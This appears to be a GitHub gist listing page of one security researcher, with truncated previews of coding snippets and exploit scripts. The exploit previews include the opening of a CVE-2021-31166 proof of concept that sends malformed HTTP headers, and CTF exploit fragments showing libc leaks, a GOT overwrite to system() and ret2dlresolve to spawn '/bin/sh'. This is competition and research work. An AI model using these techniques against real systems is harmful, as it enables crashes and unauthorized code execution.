Skip to content

Instantly share code, notes, and snippets.

Avatar
:octocat:
‎just hacking on

crazy hugsy hugsy

:octocat:
‎just hacking on
View GitHub Profile
@hugsy
hugsy / constexpr_rand.cc
Created Jul 21, 2022
Basic (bad) experiments for a constexpr rand() function
View constexpr_rand.cc
//
// Requires C++20
//
#include <cstdint>
#include <iostream>
#include <string>
constexpr static auto to_int(const char* str, int offset) {
return static_cast<std::uint32_t>(str[offset] - '0') * 10 +
View streams1.cpp
//
// http://web.archive.org/web/20150617011338/http://win32.mvps.org/ntfs/dump_ntfs_streams.cpp
//
#include <windows.h>
#include <stdio.h>
#pragma hdrstop
View Microsoft.PowerShell_profile.ps1
Import-Module posh-git
Import-Module oh-my-posh
Import-Module -Name Terminal-Icons
Set-PoshPrompt slimfat
Set-PSReadlineOption -EditMode Emacs
Set-PSReadLineKeyHandler -Chord Ctrl+LeftArrow -Function BackwardWord
Set-PSReadLineKeyHandler -Chord Ctrl+RightArrow -Function NextWord
# Set-PSReadLineKeyHandler -Chord Ctrl+Backspace -Function BackwardKillWord
View cve-2021-31166.py
#!/usr/bin/python3.9
import socket
s = socket.socket()
s.connect( ("192.168.57.99", 80) )
s.send(b"""POST / HTTP/1.1\r
Host: 192.168.57.99\r
Accept-Encoding: w00t\r
Accept-Encoding: \r
@hugsy
hugsy / xp.py
Created Mar 25, 2021
securinet - death_note
View xp.py
#!/usr/bin/env python3.8
"""
death_note - securinets quals 2021
@_hugsy_
$ checksec ./death_note
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
@hugsy
hugsy / xp.py
Last active Mar 25, 2021
securinet - membership
View xp.py
#!/usr/bin/env python3.9
"""
membership - securinets quals 2021
@_hugsy_
$ ./xp.py remote
[*] '/home/hugsy/ctf/securinets_quals_2021/membership/membership'
Arch: amd64-64-little
RELRO: Full RELRO
@hugsy
hugsy / xp.py
Created Mar 21, 2021
securinet - killshot
View xp.py
#!/usr/bin/env python3.8
"""
$ ./xp.py remote
[+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done
[*] step 1: leak stuff
[+] leaked addresses:
0x563765daa240
0x563765da9b10
0x7ffd0d86b5e0
@hugsy
hugsy / xp.py
Created Mar 15, 2021
utctf 2021 - resolve
View xp.py
#!/usr/bin/env python3.9
#
# This exploits `ret2dlresolve` technique: the idea behind this attack is
# to forge fake structures to force the LD runtime resolver to resolve and
# execute `system('/bin/sh')`.
#
# To do that, we forge 2 objects, the Rela (holding the symbol offset) and
# the Sym (holding the symbol information).
#
# Note: if using this attack, offsets must be calculated precisely and remember
@hugsy
hugsy / xp.py
Created Mar 13, 2021
utctf 2021 - monke
View xp.py
#!/usr/bin/env python3.8
"""
[*] getting control of banana[1] via banana[3]...
[*] leaking atoi in libc...
[+] leaking atoi(): 7f42bbdfa7a0
[+] libc base: 7f42bbdba000
[+] system: 7f42bbe09550
[*] overwrite atoi@got with system...
[*] trigger system()
View babyrop.py
#!/usr/bin/env python3.8
import os, sys
from pwn import *
context.update(arch="amd64", endian="little", os="linux",
terminal=["tmux", "split-window", "-v", "-p 75"],)
LOCAL = True
TARGET_ELF = os.path.realpath("./babyrop")